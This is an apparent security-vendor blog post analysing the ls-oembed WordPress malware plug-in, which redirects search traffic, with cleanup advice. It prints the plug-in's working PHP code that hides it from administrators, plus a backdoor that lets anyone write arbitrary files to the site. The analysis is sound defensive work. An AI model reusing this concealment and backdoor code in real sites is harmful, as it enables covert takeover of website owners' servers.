Skip to content

WordPress malware ls-oembed plug-in damage is growing

All access via search engines is redirected to overseas sites and the number of accesses drastically decreases

Please note that if the number of visits suddenly drops and all inflows through search engines are redirected to some other site.
This type of hacking is called redirect hacking, and it’s possible that hackers are getting monetary compensation by fraudulently sending traffic to another site.

The ls-oembed plug-in is secretly installed

This plug-in is not displayed on the management screen, and the administrator does not know whether it is installed.
If this plug-in is in the plug-in folder, such as seen via FTP, we recommend that you clean up malware from your site.

Let’s look at the code inside the plug-in.

//скрываем плагины от всех кроме главного админа start
function SECURITYFIREWALL_hide($plugins) {
    if( $_GET[SECURITYFIREWALL__ADMIN_LOGIN] == 1 ) {
        return $plugins;
    }
    $user = wp_get_current_user();
    if( $user->data->user_login === SECURITYFIREWALL__ADMIN_LOGIN ) {
        return $plugins;
    }
    if( is_plugin_active( SECURITYFIREWALL__PLUGIN ) ) {
        unset( $plugins[ SECURITYFIREWALL__PLUGIN ] );
    }
    return $plugins;
}
add_filter('all_plugins', 'SECURITYFIREWALL_hide');

This code is part of the plug-in function. This function prevents the plug-in from appearing on the management screen. Since Russian is included, there is a possibility of Russian-made malware.

Backdoor generation function included in the plug-in

This plug-in also has a function to write the following code to the WordPress upload folder.

if (isset($_POST['upload'])){
	if ($_POST['upload']=='1'){
		$uploadfile = $_POST['path'].$_FILES['uploadfile']['name'];
		if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $uploadfile))
			{echo 'ok';}
		else {echo $_FILES['uploadfile']['error'];}
		}
	if ($_POST['upload']=='2'){
		$fp=fopen($_POST['path'],'a');  
		fwrite($fp, "\r\n");
		fwrite($fp, $_POST['uploadfile']);
		fclose($fp);
		echo 'ok';
		}
	}
else {header('Location: ../../');}

This code is a backdoor code that allows any file to be placed in the WordPress directory without permission.

How to deal with malware ls-oembed plugin

Since this malware has a backdoor function, once it is infected, files can be freely read and written via the backdoor, so it is also necessary for experts to disinfect the entire website. In order to prevent the website from undergoing major tampering, it is possible to eliminate the backdoor for the time being by the following method.
● Connect to the wp-content \ plugins folder with FTP software, etc. and check if there is a folder called ls-oembed. (If there is, please delete the folder)
● Backdoors written by plug-ins were often set up as wpcsesapps.php in the wp-content folder. If this is also present, please delete it.

WordPress Doctor security-related programs
WordPress Doctor Malware Scan & Security Plug-in